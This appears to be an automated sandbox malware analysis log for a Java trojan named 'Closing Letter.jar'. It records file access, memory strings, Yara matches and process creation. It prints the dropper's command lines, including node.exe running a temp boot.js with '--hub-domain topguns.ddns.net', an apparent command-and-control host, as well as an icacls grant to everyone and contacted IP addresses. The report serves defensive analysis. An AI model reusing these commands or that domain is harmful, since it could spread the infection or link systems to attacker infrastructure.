Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js | Jump to behavior |
Source: Joe Sandbox View | IP Address: 193.228.91.12 |
Source: Joe Sandbox View | IP Address: 104.20.23.46 |
Source: java.exe, 00000002.00000002.709063871.000000000A9C0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918652198.000000000A1BD000.00000004.00000001.sdmp | String found in binary or memory: http://bugreport.sun.com/bugreport/ |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crl0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# |
Source: java.exe, 00000002.00000002.709099121.000000000A9D0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918691155.000000000A1C9000.00000004.00000001.sdmp | String found in binary or memory: http://java.oracle.com/ |
Source: javaw.exe, 00000007.00000002.936544095.000000001696B000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.926957064.00000000150E6000.00000004.00000001.sdmp | String found in binary or memory: http://null.oracle.com/ |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0# |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://policy.camerfirma.com0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://repository.swisssign.com/0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0 |
Source: javaw.exe, 00000007.00000003.674948698.00000000025E1000.00000004.00000001.sdmp | String found in binary or memory: http://www.allatori.com |
Source: java.exe, 00000002.00000002.720781521.00000000164D0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.931142684.0000000015C88000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class2.crl0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.chambersign.org1 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cps0 |
Source: node.exe, 00000013.00000002.951812248.00007FF64CE07000.00000002.00020000.sdmp | String found in binary or memory: http://www.unicode.org/copyright.html |
Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmp | String found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=6593 |
Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/v8/v8/blob/d6ead37d265d7215cf9c5f768f279e21bd170212/src/js/prologue.js#L152-L156 |
Source: java.exe, 00000002.00000002.709137697.000000000AA07000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918691155.000000000A1C9000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: https://nodejs.org/dist/v14.12.0/ |
Source: javaw.exe, 00000007.00000002.936026786.0000000016840000.00000004.00000001.sdmp | String found in binary or memory: https://nodejs.org/dist/v14.12.0/3FCA97F |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0 |
Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmp | String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761 |
Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process Stats: CPU usage > 98% |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_032DEC17 | 2_2_032DEC17 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC06584 | 7_3_0AC06584 |
Source: classification engine | Classification label: mal60.troj.expl.evad.winJAR@15/1028@4/3 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1320:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'' >> C:\cmdlinestart.log 2>&1 | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar' | |
Source: unknown | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp | |
Source: unknown | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net | |
Source: unknown | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar' | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net | Jump to behavior |
Source: Yara match | File source: Closing Letter.jar, type: SAMPLE |
Source: Yara match | File source: 00000007.00000003.674948698.00000000025E1000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000002.912897413.0000000002958000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.707554230.00000000031B8000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.707993632.000000000548C000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.653167812.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: java.exe PID: 4240, type: MEMORY |
Source: Yara match | File source: Process Memory Space: javaw.exe PID: 6900, type: MEMORY |
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\28fda05a.tmp, type: DROPPED |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323D877 push 00000000h; mov dword ptr [esp], esp | 2_2_0323D8A1 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323BB27 push 00000000h; mov dword ptr [esp], esp | 2_2_0323BB4D |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323B377 push 00000000h; mov dword ptr [esp], esp | 2_2_0323B39D |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323B907 push 00000000h; mov dword ptr [esp], esp | 2_2_0323B92D |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323A1CA push ecx; ret | 2_2_0323A1DA |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323A1DB push ecx; ret | 2_2_0323A1E5 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323D860 push 00000000h; mov dword ptr [esp], esp | 2_2_0323D8A1 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_03242D44 push eax; retf | 2_2_03242D45 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323C437 push 00000000h; mov dword ptr [esp], esp | 2_2_0323C45D |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_032D9751 push cs; retf | 2_2_032D9771 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC03B42 push eax; iretd | 7_3_0AC03B69 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC02957 push eax; iretd | 7_3_0AC02A29 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC00427 push eax; iretd | 7_3_0AC00441 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC02A30 push eax; iretd | 7_3_0AC02A29 |
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed. |
Source: java.exe, 00000002.00000002.707500483.0000000003130000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.912762157.00000000028D0000.00000004.00000001.sdmp | Binary or memory string: ,java/lang/VirtualMachineError |
Source: java.exe, 00000002.00000002.707500483.0000000003130000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.912762157.00000000028D0000.00000004.00000001.sdmp | Binary or memory string: |[Ljava/lang/VirtualMachineError; |
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service. |
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported. |
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service. |
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp | Binary or memory string: Program Manager |
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd |
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp | Binary or memory string: Progman |
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData\Local VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE VolumeInformation | Jump to behavior |